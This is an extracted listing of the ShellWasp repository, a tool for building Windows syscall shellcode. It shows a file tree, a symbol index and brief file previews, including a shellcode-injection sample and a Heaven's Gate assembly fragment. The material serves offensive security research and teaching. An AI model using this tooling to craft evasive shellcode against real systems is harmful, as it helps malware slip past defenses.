├── singleton/
│ ├── __init__.py
│ └── helpers.py
├── syscallAIHelper.py
├── syscallAiPrompts.py
├── syscallPossibleValues.py
├── syscall_parser_toJson.py
├── syscall_signatures.json
├── syscall_signatures.py
└── ui.py
SYMBOL INDEX (106 symbols across 8 files)
FILE: Samples/BHMEA _shellcode_injection3.cpp
function main (line 18) | int main()
FILE: Samples/alternative_create_process_tester.c
function main (line 31) | int main(int argc, char **argv) {
FILE: start/convertSyscallsToReverse.py
class EMU (line 3) | class EMU():
method __init__ (line 4) | def __init__(self):
FILE: start/parseconf.py
class Configuration (line 7) | class Configuration(metaclass=Singleton):
method __init__ (line 9) | def __init__(self, cfgFile):
method readConf (line 13) | def readConf(self):
method changeConf (line 22) | def changeConf(self, *args):
method save (line 84) | def save(self):
FILE: start/shellWasp.py
class shellcode (line 44) | class shellcode():
method __init__ (line 45) | def __init__(self):
method style (line 59) | def style(self):
method comp (line 61) | def comp(self):
method setStyle (line 63) | def setStyle(self,style):
method setComp (line 65) | def setComp(self,comp):
class configOpt (line 68) | class configOpt():
method __init__ (line 69) | def __init__(self):
class winReleases (line 88) | class winReleases():
method __init__ (line 89) | def __init__(self):
class winSyscalls (line 113) | class winSyscalls():
method __init__ (line 114) | def __init__(self):
class shellBytes (line 120) | class shellBytes:
method __init__ (line 121) | def __init__(self):
function checkWinOSBools (line 132) | def checkWinOSBools():
function readConf (line 159) | def readConf():
function sanitizeSyscallsAdded (line 285) | def sanitizeSyscallsAdded(tempSys2):
function sanitizeSyscalls (line 294) | def sanitizeSyscalls():
function saveConf (line 304) | def saveConf(con):
function modConf (line 315) | def modConf():
function isWin7 (line 444) | def isWin7():
function isWin1011 (line 452) | def isWin1011():
function buildAiPromptSectionForSyscall (line 460) | def buildAiPromptSectionForSyscall(mySyscall, syscall_signature, syscall...
function chunkList (line 498) | def chunkList(items, itemsPerChunk):
function buildApiBlocksFromSyscalls (line 503) | def buildApiBlocksFromSyscalls(syscallChoices, syscall_signature, funcsP...
function stripLeadingTextCaseInsensitive (line 531) | def stripLeadingTextCaseInsensitive(text, prefix):
function buildAiStructureMap (line 540) | def buildAiStructureMap(aiFinalResult):
function initAiState (line 556) | def initAiState(aiFinalResult):
function getNextAiCallEntry (line 571) | def getNextAiCallEntry(aiState):
function getAiPushEntry (line 583) | def getAiPushEntry(aiCallEntry, pushIndex):
function buildStructLinesFromAi (line 599) | def buildStructLinesFromAi(structureRef, aiState, commentColumn=24, show...
function sanitizeAdditionalComment (line 646) | def sanitizeAdditionalComment(paramType, paramName, additionalComment):
function buildAlignedPushLine (line 686) | def buildAlignedPushLine(pushValue, commentText, commentColumn=24):
function buildStructLines (line 696) | def buildStructLines(structureRef, syscallEntry, commentColumn=24):
function buildSampleValsComment (line 728) | def buildSampleValsComment(paramType, paramName, additionalComment):
function buildSyscall (line 738) | def buildSyscall(print_to_file=False):
function selectFindOSBuildText (line 1546) | def selectFindOSBuildText():
function selectFindOSBuild (line 1601) | def selectFindOSBuild():
function selectSyscallStyle (line 1708) | def selectSyscallStyle():
function selectCompilerStyle (line 1763) | def selectCompilerStyle():
function selectUserSharedOptions (line 1801) | def selectUserSharedOptions():
function selectUserShared (line 1852) | def selectUserShared():
function uiSyscallStyle (line 1931) | def uiSyscallStyle():
function uiAddWinReleases (line 2034) | def uiAddWinReleases():
function uiAddSyscalls (line 2149) | def uiAddSyscalls():
function uiShowWinReleases (line 2181) | def uiShowWinReleases(number=None):
function uiShowSyscalls (line 2225) | def uiShowSyscalls(number=None):
function uiRearrangeSyscalls (line 2237) | def uiRearrangeSyscalls():
function uiEditWinReleases (line 2269) | def uiEditWinReleases():
function uiEditSyscalls (line 2309) | def uiEditSyscalls():
function uiShowOptionsMainMenu (line 2348) | def uiShowOptionsMainMenu():
function uiShowOptionsSyscallSelections (line 2365) | def uiShowOptionsSyscallSelections():
function uiShowOptionsWinReleaseSelections (line 2373) | def uiShowOptionsWinReleaseSelections():
function giveInputWinReleases (line 2382) | def giveInputWinReleases():
function giveInput (line 2409) | def giveInput():
function generateBytes (line 2437) | def generateBytes(shellInput):
function ui (line 2448) | def ui():
function syscallMain (line 2514) | def syscallMain():
FILE: start/singleton/helpers.py
class Singleton (line 5) | class Singleton(ABCMeta):
method __call__ (line 15) | def __call__(cls, *args, **kwargs) -> Any:
FILE: start/syscallAIHelper.py
function dprint (line 50) | def dprint(*args, **kwargs):
function resetRunStats (line 55) | def resetRunStats():
function estimateCostFromCounts (line 63) | def estimateCostFromCounts(modelName: str, promptTokens: int, completion...
function addUsageToRunStats (line 70) | def addUsageToRunStats(modelName: str, usageObj) -> float:
function printRunStats (line 86) | def printRunStats():
function makeEmptyAggregate (line 95) | def makeEmptyAggregate():
function getWorkingDir (line 102) | def getWorkingDir():
function getJsonDir (line 106) | def getJsonDir(baseDir=None):
function getTimestamp (line 116) | def getTimestamp():
function sanitizeFilenamePiece (line 120) | def sanitizeFilenamePiece(text: str) -> str:
function getFirstFuncName (line 135) | def getFirstFuncName(result: dict) -> str:
function writeTextAtomic (line 144) | def writeTextAtomic(path: Path, text: str):
function saveJsonFile (line 150) | def saveJsonFile(path: Path, data: dict):
function loadJsonFile (line 155) | def loadJsonFile(path: Path):
function convertChunkStructuresToDict (line 171) | def convertChunkStructuresToDict(result: dict) -> dict:
function normalizeAggregate (line 215) | def normalizeAggregate(data):
function loadCurrentAggregate (line 228) | def loadCurrentAggregate(jsonDir: Path):
function saveCurrentAggregate (line 238) | def saveCurrentAggregate(aggregate: dict, jsonDir: Path):
function renderCallsNicerText (line 244) | def renderCallsNicerText(result, showStructureFields=True):
function getNextStructNum (line 251) | def getNextStructNum(structureDict: dict) -> int:
function saveResultsBundle (line 268) | def saveResultsBundle(result, baseDir=None, saveStem=SAVE_STEM, showStru...
function mergeChunkResult (line 308) | def mergeChunkResult(aggregate: dict, chunkResult: dict, chunkIndex: int...
function formatField (line 346) | def formatField(field, nameWidth=24, typeWidth=20):
function formatStructure (line 358) | def formatStructure(structId, structDef):
function formatPushEntry (line 374) | def formatPushEntry(entry, structureMap=None, commentColumn=24, showStru...
function formatPushes (line 410) | def formatPushes(pushes, structureMap=None, commentColumn=24, showStruct...
function formatPushesNicer (line 420) | def formatPushesNicer(pushes, structureMap=None, showStructureFields=True):
function formatCalls (line 429) | def formatCalls(result, showStructureFields=True):
function formatCallsNicer (line 446) | def formatCallsNicer(result, showStructureFields=True):
function runPrompt (line 450) | def runPrompt(myPrompt: str):
function runPromptWithRetry (line 482) | def runPromptWithRetry(myPrompt: str, maxRetries=5, baseDelay=3):
function chunkList (line 518) | def chunkList(items, chunkSize):
function buildChunkPrompt (line 523) | def buildChunkPrompt(promptPrefix: str, apiChunk: list[str]) -> str:
function processApiBlocksInChunks (line 527) | def processApiBlocksInChunks(
function buildPossibleValues (line 575) | def buildPossibleValues(
FILE: start/ui.py
function showOptions (line 17) | def showOptions():
function splash (line 20) | def splash():
Condensed preview — 28 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (2,910K chars).
[
{
"path": "LICENSE",
"chars": 1076,
"preview": "MIT License\n\nCopyright (c) 2022 Bramwell Brizendine\n\nPermission is hereby granted, free of charge, to any person obtaini"
},
{
"path": "README.md",
"chars": 13665,
"preview": "# ShellWasp 2.1\n\n\nShellWasp is a the original tool to faciliate creating shellcode utilizing syscalls. ShellWasp helps b"
},
{
"path": "Samples/BHMEA _shellcode_injection3.cpp",
"chars": 23489,
"preview": "// Author: Dr. Bramwell Brizendine\r\n// Event: Black Hat Middle East and Africa in Riyadh, KSA\r\n// This uses the ShellWas"
},
{
"path": "Samples/alternative_create_process.asm",
"chars": 10242,
"preview": "\r\n; Author: Shelby VandenHoek (VERONA Labs)\r\n; This was made to highlight the ShellWasp technique for syscall shellcode."
},
{
"path": "Samples/alternative_create_process_SHAREM_output.txt",
"chars": 3038,
"preview": "Output from SHAREM: https://github.com/Bw3ll/sharem\r\n\r\n\r\n [*] Emulating x86 shellcode\r\n [*] CPU counter: 3"
},
{
"path": "Samples/alternative_create_process_tester.c",
"chars": 5342,
"preview": "\r\n// ; Author: Shelby VandenHoek (VERONA Labs)\r\n// ; This was made to highlight the ShellWasp technique for syscall shel"
},
{
"path": "setup.py",
"chars": 673,
"preview": "from setuptools import setup, find_packages\r\nimport os\r\nimport re\r\n\r\nNAME = \"ShellWasp\"\r\nVERSION = \"1.0.1\"\r\nREQUIREMENTS"
},
{
"path": "shellWasp.py",
"chars": 136,
"preview": "import start.shellWasp\r\n\r\nfrom start.shellWasp import *\r\nif __name__ == \"__main__\":\r\n\tprint (\"hi. i am an evil wasp.\\n\")"
},
{
"path": "start/Syscall Output/Win1011_NtAllocateVirtualMemory_NtQuerySystemInformation_NtOpenProcess_20230414_143422.txt",
"chars": 5864,
"preview": "call GetPC1\r\nGetPC1:\r\nadd [esp], 5 \r\nretf\t\t\t; Invoke Heaven's gate -- go x64\r\n\r\ndb 0x41,0x8b,0x1c,0x24\t; x64: mov ebx,dw"
},
{
"path": "start/WinDbgList.txt",
"chars": 15838,
"preview": "\r\nwinDbgList\r\nu ntdll!NtAccessCheck L2\r\nu ntdll!NtAccessCheckAndAuditAlarm L2\r\nu ntdll!NtAccessCheckByType L2\r\nu ntdll!N"
},
{
"path": "start/WinSysCalls.json",
"chars": 397025,
"preview": "{\"Windows XP\": {\"SP1\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\""
},
{
"path": "start/__init__.py",
"chars": 94,
"preview": "from . syscall_signatures import *\r\n\r\n# from parseconf import *\r\nfrom . parseconf import *\r\n\r\n"
},
{
"path": "start/config.cfg",
"chars": 864,
"preview": "[Windows 10]\r\nr21h2 = True\r\nr22h2 = True\r\nr21h1 = False\r\nr20h2 = False\r\nr2004 = False\r\nr1909 = False\r\nr1903 = False\r\nr18"
},
{
"path": "start/convertSyscallsToReverse.py",
"chars": 2168,
"preview": "import os\r\nimport json\r\nclass EMU():\r\n def __init__(self):\r\n self.maxCounter = 500000\r\n self.arch = 32\r"
},
{
"path": "start/myKeys.py",
"chars": 35,
"preview": "\r\nOPENAI_API_KEY=\"putYourKeyHere\"\r\n"
},
{
"path": "start/parseconf.py",
"chars": 2981,
"preview": "import os\r\nimport configparser\r\n\r\nfrom .singleton import Singleton\r\n\r\n\r\nclass Configuration(metaclass=Singleton):\r\n\r\n "
},
{
"path": "start/reverseWinSyscalls.json",
"chars": 367203,
"preview": "\r\n{\"Windows XP\": {\"SP1\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \""
},
{
"path": "start/reverseWinSyscallsInt.json",
"chars": 412246,
"preview": "{\"Windows XP\": {\"SP1\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFi"
},
{
"path": "start/shellWasp.py",
"chars": 84928,
"preview": "import os\r\nimport json\r\nfrom .syscall_signatures import *\r\nfrom .ui import *\r\nfrom keystone import *\r\nfrom binascii impo"
},
{
"path": "start/singleton/__init__.py",
"chars": 57,
"preview": "from .helpers import Singleton\r\n\r\n__all__ = [\"Singleton\"]"
},
{
"path": "start/singleton/helpers.py",
"chars": 453,
"preview": "from abc import ABCMeta\r\nfrom typing import Any\r\n\r\n\r\nclass Singleton(ABCMeta):\r\n \"\"\"\r\n \r\n This class is a stand"
},
{
"path": "start/syscallAIHelper.py",
"chars": 16238,
"preview": "from pathlib import Path\r\nfrom datetime import datetime\r\nfrom contextlib import redirect_stdout\r\nimport io\r\nimport os\r\ni"
},
{
"path": "start/syscallAiPrompts.py",
"chars": 20074,
"preview": "PROMPT_PREFIX = \"\"\" \r\nReturn structured JSON with highly realistic sample values.\r\nYou are given Windows assembly push "
},
{
"path": "start/syscallPossibleValues.py",
"chars": 909565,
"preview": "\r\nsyscallPossibleValues = {\r\n \"NtWorkerFactoryWorkerReady\": {\r\n \"ntFunc\": \"NtWorkerFactoryWorkerReady\",\r\n \"pushes"
},
{
"path": "start/syscall_parser_toJson.py",
"chars": 46658,
"preview": "win11_21H2=\"\"\"SYSCALL ADDRESS FUNCTION\r\n\r\n0x02\t 00007FFBF39E3F40\tNtAcceptConnectPort\r\n0x00\t 00007FFBF39E3F00"
},
{
"path": "start/syscall_signatures.json",
"chars": 113370,
"preview": " {\"NtWorkerFactoryWorkerReady\":(1, [\"HANDLE\"], [\"WorkerFactoryHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtMapUserPhysicalPagesSc"
},
{
"path": "start/syscall_signatures.py",
"chars": 158566,
"preview": "syscall_signature = {'NtWorkerFactoryWorkerReady': (1, ['HANDLE'], ['WorkerFactoryHandle'], 'NTSTATUS', ['__IN']), 'NtM"
},
{
"path": "start/ui.py",
"chars": 2626,
"preview": "import colorama\r\n\r\ncolorama.init()\r\n\r\n\r\nred ='\\u001b[31;1m'\r\ngre = '\\u001b[32;1m'\r\nyel = '\\u001b[33;1m'\r\nblu = '\\u001b[3"
}
]
About this extraction
This page contains the full source code of the Bw3ll/ShellWasp GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 28 files (2.5 MB), approximately 654.9k tokens, and a symbol index with 106 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.